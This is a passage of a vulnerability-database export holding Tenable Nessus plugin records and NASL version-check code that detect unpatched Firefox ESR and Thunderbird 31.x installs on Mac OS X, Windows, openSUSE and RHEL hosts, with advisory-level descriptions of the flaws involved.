"MACOSX_FIREFOX_31_4_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/80519", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80519);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-8634\",\n \"CVE-2014-8635\",\n \"CVE-2014-8638\",\n \"CVE-2014-8639\",\n \"CVE-2014-8641\"\n );\n script_bugtraq_id(\n 72044,\n 72046,\n 72047,\n 72049,\n 72050\n );\n\n script_name(english:\"Firefox ESR 31.x < 31.4 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox ESR 31.x installed on the remote Mac OS X host\nis prior to 31.4. It is, therefore, affected by the following\nvulnerabilities :\n\n - Multiple unspecified memory safety issues exist within\n the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it\n does not follow the cross-origin resource sharing\n specification. This results in requests from\n 'sendBeacon()' lacking an 'origin' header, which allows\n malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication\n responses with a 'set-cookie' header. This can allow\n a session-fixation attack. (CVE-2014-8639)\n\n - A read-after-free flaw exists in WebRTC due to the way\n tracks are handled, which can result in a potentially\n exploitable crash or incorrect WebRTC behavior.\n (CVE-2014-8641)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Firefox ESR 31.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Installed\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Firefox\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nis_esr = get_kb_item(kb_base+\"/is_esr\");\nif (isnull(is_esr)) audit(AUDIT_NOT_INST, \"Mozilla Firefox ESR\");\n\nmozilla_check_version(product:'firefox', version:version, path:path, esr:TRUE, fix:'31.4', min:'31.0', severity:SECURITY_HOLE, xss:FALSE, xsrf:TRUE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:39", "description": "The version of Thunderbird installed on the remote Mac OS X host is prior to 31.4. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header. This allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "Mozilla Thunderbird < 31.4 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MACOSX_THUNDERBIRD_31_4.NASL", "href": "https://www.tenable.com/plugins/nessus/80521", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80521);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-8634\",\n \"CVE-2014-8635\",\n \"CVE-2014-8638\",\n \"CVE-2014-8639\"\n );\n script_bugtraq_id(\n 72046,\n 72047,\n 72049,\n 72050\n );\n\n script_name(english:\"Mozilla Thunderbird < 31.4 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version of Thunderbird.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a mail client that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Thunderbird installed on the remote Mac OS X host is\nprior to 31.4. It is, therefore, affected by the following\nvulnerabilities :\n\n - Multiple unspecified memory safety issues exist within\n the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it\n does not follow the cross-origin resource sharing\n specification. This results in requests from\n 'sendBeacon()' lacking an 'origin' header. This allows\n malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication\n responses with a 'set-cookie' header. This can allow\n a session-fixation attack. (CVE-2014-8639)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Thunderbird 31.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8635\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_thunderbird_installed.nasl\");\n script_require_keys(\"MacOSX/Thunderbird/Installed\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Thunderbird\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nif (get_kb_item(kb_base + '/is_esr')) exit(0, 'The Mozilla Thunderbird install is in the ESR branch.');\n\nmozilla_check_version(product:'thunderbird', version:version, path:path, esr:FALSE, fix:'31.4', min:'31.0', severity:SECURITY_HOLE, xss:FALSE, xsrf:TRUE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:50", "description": "The version of Thunderbird installed on the remote Windows host is prior to 31.4. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header. This allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "Mozilla Thunderbird < 31.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MOZILLA_THUNDERBIRD_31_4.NASL", "href": "https://www.tenable.com/plugins/nessus/80524", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80524);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-8634\",\n \"CVE-2014-8635\",\n \"CVE-2014-8638\",\n \"CVE-2014-8639\"\n );\n script_bugtraq_id(\n 72046,\n 72047,\n 72049,\n 72050\n );\n\n script_name(english:\"Mozilla Thunderbird < 31.4 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Thunderbird.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a mail client that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Thunderbird installed on the remote Windows host is\nprior to 31.4. It is, therefore, affected by the following\nvulnerabilities :\n\n - Multiple unspecified memory safety issues exist within\n the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it\n does not follow the cross-origin resource sharing\n specification. This results in requests from\n 'sendBeacon()' lacking an 'origin' header. This allows\n malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication\n responses with a 'set-cookie' header. This can allow\n a session-fixation attack. (CVE-2014-8639)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Thunderbird 31.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8635\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Thunderbird/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Thunderbird/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Thunderbird\");\n\nmozilla_check_version(installs:installs, product:'thunderbird', esr:FALSE, fix:'31.4', min:'31.0', severity:SECURITY_HOLE, xss:FALSE, xsrf:TRUE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:48:25", "description": "MozillaThunderbird was updated to Thunderbird 31.4.0 (bnc#910669)\n\n - MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous memory safety hazards\n\n - MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an Origin header\n\n - MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through Proxy Authenticate responses", "cvss3": {}, "published": "2015-01-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : MozillaThunderbird (openSUSE-SU-2015:0133-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:MozillaThunderbird", "p-cpe:/a:novell:opensuse:MozillaThunderbird-buildsymbols", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource", "p-cpe:/a:novell:opensuse:MozillaThunderbird-devel", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-69.NASL", "href": "https://www.tenable.com/plugins/nessus/80993", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-69.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80993);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n\n script_name(english:\"openSUSE Security Update : MozillaThunderbird (openSUSE-SU-2015:0133-1)\");\n script_summary(english:\"Check for the openSUSE-2015-69 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MozillaThunderbird was updated to Thunderbird 31.4.0 (bnc#910669)\n\n - MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous\n memory safety hazards\n\n - MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon\n requests lack an Origin header\n\n - MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie\n injection through Proxy Authenticate responses\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=910669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-01/msg00071.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaThunderbird packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-31.4.0-70.43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-buildsymbols-31.4.0-70.43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-debuginfo-31.4.0-70.43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-debugsource-31.4.0-70.43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-devel-31.4.0-70.43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-translations-common-31.4.0-70.43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-translations-other-31.4.0-70.43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-31.4.0-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-buildsymbols-31.4.0-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-debuginfo-31.4.0-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-debugsource-31.4.0-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-devel-31.4.0-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-translations-common-31.4.0-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-translations-other-31.4.0-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaThunderbird / MozillaThunderbird-buildsymbols / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-18T15:14:48", "description": "Versions of Mozilla Thunderbird prior to 31.4 are prone to the following vulnerabilities : \n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n - A flaw exists in 'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header. This allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)", "cvss3": {}, "published": "2015-01-16T00:00:00", "type": "nessus", "title": "Mozilla Thunderbird < 31.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "8625.PRM", "href": "https://www.tenable.com/plugins/nnm/8625", "sourceData": "Binary data 8625.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:48:02", "description": "Updated firefox packages that fix multiple security issues and one bug are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the XUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not follow the Cross-Origin Resource Sharing (CORS) specification. A web page containing malicious content could allow a remote attacker to conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura, Xiaofeng Zheng, and Mitchell Harper as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security advisories for Firefox 31.4.0 ESR. You can find a link to the Mozilla advisories in the References section of this erratum.\n\nThis update also fixes the following bug :\n\n* The default dictionary for Firefox's spell checker is now correctly set to the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which contain Firefox version 31.4.0 ESR, which corrects these issues. After installing the update, Firefox must be restarted for the changes to take effect.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : firefox (RHSA-2015:0046)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:firefox", "p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo", "p-cpe:/a:redhat:enterprise_linux:xulrunner", "p-cpe:/a:redhat:enterprise_linux:xulrunner-debuginfo", "p-cpe:/a:redhat:enterprise_linux:xulrunner-devel", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-0046.NASL", "href": "https://www.tenable.com/plugins/nessus/80508", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0046. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80508);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_bugtraq_id(72044, 72046, 72047, 72049);\n script_xref(name:\"RHSA\", value:\"2015:0046\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : firefox (RHSA-2015:0046)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated firefox packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did\nnot follow the Cross-Origin Resource Sharing (CORS) specification. A\nweb page containing malicious content could allow a remote attacker to\nconduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Christian Holler, Patrick McManus,\nMuneaki Nishimura, Xiaofeng Zheng, and Mitchell Harper as the original\nreporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 31.4.0 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis update also fixes the following bug :\n\n* The default 